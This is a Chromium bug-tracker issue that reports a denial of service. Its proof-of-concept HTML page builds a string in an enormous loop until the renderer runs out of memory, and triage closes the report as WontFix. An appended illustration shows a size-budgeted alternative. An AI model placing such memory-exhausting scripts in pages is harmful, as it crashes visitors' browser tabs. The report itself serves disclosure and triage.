
Issue 881968


Issue metadata

Status: WontFix
Owner: ----
Closed: Sep 7
EstimatedDays: ----
NextAction: ----
OS: Linux
Pri: 2
Type: Bug-Security


Denial Of Service

Reported by mishra.d...@gmail.com, Sep 7

Issue description

UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0

Steps to reproduce the problem:
Product affected:
OS: Linux
Chromium: 68.0.3440.106 (Official Build) (64-bit)
Revision: 1c32c539ce0065a41cb79da7bfcd2c71af1afe62-refs/branch-heads/3440@{#794}
JavaScript: V8 6.8.275.26

Steps to reproduce:
1. Open poc.html
2. Wait for a while
3. You see the snap page!

In debug mode, the JS stack below was generated.

<--- JS stacktrace --->

==== JS stack trace =========================================

    0: ExitFrame [pc: 0x3560c1f5c33d]
    1: StubFrame [pc: 0x3560c1f5d6ff]
Security context: 0x09f3d4907499 <Window map = 0xff155b02259>
    2: /* anonymous */ [0x9f3d497ebe1] [file:///home/input0/Desktop/1.html:~3] [pc=0x3560c1fc96b4](this=0x1cb6add07f51 <JSGlobal Object>)
    3: InternalFrame [pc: 0x3560c1f0eed5]
    4: EntryFrame [pc: 0x3560c1f059a1]

==== Details ================================================

[0]: ExitFrame [pc: 0...

What is the expected behavior?

What went wrong?
poc.html

<script>
// Appends one newline per iteration; every append allocates a new string
// object, so the renderer exhausts its memory long before the loop ends.
var a = '';
for (var i = 1; i <= 500000000000; i++)
{
  a += '\n';
}
alert(a);
</script>

Did this work before? No 

Chrome version: 68.0.3440.106 (Official Build) (64-bit)  Channel: n/a
OS Version: 
Flash Version: Shockwave Flash 30.0 r0
 
Status: WontFix (was: Unconfirmed)
Hi! Thank you for the report. In this case, the web page allocated far too much memory and crashed its renderer process. This is fine; if the website wants to crash its own tab it's free to do so. There are many other ways to allocate too much memory and there's not much we can do about this, nor is it too big of a deal.

I'm closing this as WontFix. We appreciate the report though, and if anything else catches your eye or behaves strangely in Chrome, please feel free to file another report.
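The same loop with an explicit size budget, added here as an illustration and not code from the issue or from Chromium: the result length is checked before anything is allocated, so a page that builds large strings gets a catchable RangeError instead of growing until its renderer process is killed. The budget value and function names are constructed for the example.

```javascript
// Added example (not part of the issue): the reporter's loop with an explicit
// budget, so a page that builds large strings fails fast with a catchable
// RangeError instead of growing until the renderer process is killed.

const DEFAULT_BUDGET_CHARS = 64 * 1024 * 1024; // 64 Mi chars; a constructed limit

// Build `count` copies of `piece`, refusing up front if the result would exceed
// `budgetChars`. The check runs before any allocation, which is the difference
// from the PoC: there the only limit is the renderer's own memory.
function buildRepeated(count, piece, budgetChars = DEFAULT_BUDGET_CHARS) {
  if (!Number.isSafeInteger(count) || count < 0) {
    throw new RangeError(`count must be a non-negative safe integer, got ${count}`);
  }
  if (typeof piece !== 'string' || piece.length === 0) {
    throw new TypeError('piece must be a non-empty string');
  }
  const total = count * piece.length;
  if (total > budgetChars) {
    throw new RangeError(`refusing to build ${total} chars (budget ${budgetChars})`);
  }
  // String.prototype.repeat allocates the flat result once; the PoC's
  // `a += '\n'` allocates a new string object on every iteration instead.
  return piece.repeat(count);
}

// Wrap the builder so a failure stays inside the page: the caller receives an
// error record rather than the tab crashing.
function tryBuildRepeated(count, piece, budgetChars) {
  try {
    return { ok: true, value: buildRepeated(count, piece, budgetChars) };
  } catch (e) {
    return { ok: false, error: e.name, message: e.message };
  }
}
```

With the issue's parameters (500000000000 newlines) the request is rejected immediately; the small cases below show normal use.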
Comment 2 by sheriffbot@chromium.org (Project Member), Dec 15

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot